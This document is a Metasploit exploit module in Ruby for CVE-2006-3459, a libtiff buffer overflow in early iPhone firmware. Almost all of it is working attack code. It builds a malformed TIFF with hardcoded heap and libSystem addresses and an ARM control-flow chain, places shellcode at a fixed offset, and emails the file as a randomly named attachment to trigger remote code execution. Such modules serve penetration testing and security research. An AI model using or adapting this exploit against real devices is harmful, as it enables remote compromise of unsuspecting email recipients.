GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/apple_ios/email/mobilemail_libtiff.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
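class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  #
  # This module sends email messages via smtp
  #
  include Msf::Exploit::Remote::SMTPDeliver

  # Module metadata.
  #
  # The module is declared Passive: it never connects to the device itself.
  # It hands one crafted message to the SMTP mixin (see #exploit) and then
  # backgrounds, waiting for a session to arrive. Each target carries two
  # addresses consumed by #generate_tiff: 'Heap', the address the crafted
  # body is expected to land at, and 'Magic', which the author annotates as
  # an address inside libSystem.dylib.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple iOS MobileMail LibTIFF Buffer Overflow',
      'Description'    => %q{
This module exploits a buffer overflow in the version of
libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
1.1.1 of the Apple iPhone. iPhones which have not had the BSD
tools installed will need to use a special payload.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['hdm', 'kf'],
      'References'     =>
        [
          ['CVE', '2006-3459'],
          ['OSVDB', '27723'],
          ['BID', '19283']
        ],
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Payload'        =>
        {
          # 196 (payload offset inside the body) + 1800 stays below the
          # 2048-byte body built in #generate_tiff.
          'Space'    => 1800,
          'BadChars' => "",
          'Compat'   =>
            {
              'ConnectionType' => '-bind -find',
            },
        },
      'Arch'           => ARCH_ARMLE,
      'Platform'       => %w{ osx },
      'Targets'        =>
        [
          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
            {
              'Platform' => 'osx',

              # Scratch space for our shellcode and stack
              'Heap'  => 0x00802000,

              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
              'Magic' => 0x300d562c,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2006-08-01'
    ))
  end

  # Opt this module out of automatic module selection: there is no host to
  # match against, only a MAILTO recipient (presumably why the framework's
  # autofilter hook is answered with false here).
  def autofilter
    false
  end

  # Build and send the malicious message.
  #
  # Reads the datastore options SUBJECT (optional; a random subject is used
  # when unset), MAILTO and MAILFROM, and delivers through the SMTPDeliver
  # mixin's send_message. Returns nothing useful; a session, if one is
  # ever established, is handled by the framework after this method exits.
  def exploit
    exts = ['jpg', 'tiff', 'tif']

    # The extension only affects the attachment name; the attachment
    # content is the same TIFF regardless of which one is picked.
    gext = exts[rand(exts.length)]
    data = Rex::Text.rand_text_alpha(rand(32)+1)
    tiff = generate_tiff(target)

    msg = Rex::MIME::Message.new
    msg.mime_defaults
    msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)
    msg.to   = datastore['MAILTO']
    msg.from = datastore['MAILFROM']

    # A random inline text body, then the crafted file as an attachment
    # whose base name is randomised on every run (1..32 alpha characters).
    msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline")
    msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + "." + gext)

    send_message(msg.to_s)

    print_status("Waiting for a payload session (backgrounding)...")
  end

  # Build the TIFF that triggers the overflow.
  #
  # File layout: little-endian ("II") TIFF whose single IFD sits at offset
  # 0x1e and holds 8 entries. The first seven are ordinary ImageWidth,
  # ImageLength, Compression, Photometric, StripOffsets, StripByteCounts
  # and PlanarConfiguration tags; the eighth is tag 0x0150 (DotRange) with
  # a count of `lolz` (2048) SHORTs stored at offset 0x84. The fixed header
  # is exactly 132 (0x84) bytes, so the `hehe` body appended at the end is
  # what that entry points to. The oversized DotRange count is the
  # malformed input the vulnerable libtiff mishandles (see the CVE
  # reference in #initialize).
  #
  # @param targ [#[]] the selected target; only 'Heap' and 'Magic' are read
  # @return [String] header followed by the 2048-byte body (String#<< returns
  #   the receiver, so the last expression yields the whole file)
  def generate_tiff(targ)
    #
    # This is a TIFF file, we have a huge range of evasion
    # capabilities, but for now, we don't use them.
    # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
    #

    lolz = 2048
    tiff =
      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
      [lolz].pack("V") +
      "\x84\x00\x00\x00\x00\x00\x00\x00"

    # Randomize the bajeezus out of our data
    # (random filler; the fixed-offset writes below overwrite the slots the
    # target-specific layout depends on, everything else stays random)
    hehe = rand_text(lolz)

    # Were going to candy mountain!
    hehe[120, 4] = [targ['Magic']].pack("V")

    # >> add r0, r4, #0x30
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")

    # Candy mountain, Charlie!
    # >> mov r1, sp

    # It will be an adventure!
    # >> mov r2, r8
    # (hehe.length is lolz, i.e. 2048, at this point)
    hehe[ 92, 4] = [ hehe.length ].pack("V")

    # Its a magic leoplurodon!
    # It has spoken!
    # It has shown us the way!
    # >> bl _memcpy

    # Its just over this bridge, Charlie!
    # This magical bridge!
    # >> ldr r3, [r4, #32]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #32]
    # >> ldr r3, [r4, #36]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #36]
    # >> ldr r3, [r4, #40]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #40]
    # >> ldr r3, [r4, #44]
    # >> ldrt r3, [pc], r3, lsr #30
    # >> str r3, [r4, #44]

    # We made it to candy mountain!
    # Go inside Charlie!
    # sub sp, r7, #0x14
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")

    # Goodbye Charlie!
    # ;; targ['Heap'] + 0x48 becomes the stack pointer
    # >> ldmia sp!, {r8, r10}

    # Hey, what the...!
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

    # Return back to the copied heap data
    hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")

    # Insert our actual shellcode at heap location + 196.
    # No bound check here: 'Space' => 1800 in the metadata guarantees
    # 196 + payload.encoded.length <= 1996 < lolz, so the write cannot grow
    # the body past 2048 bytes.
    hehe[196, payload.encoded.length] = payload.encoded

    tiff << hehe
  end
end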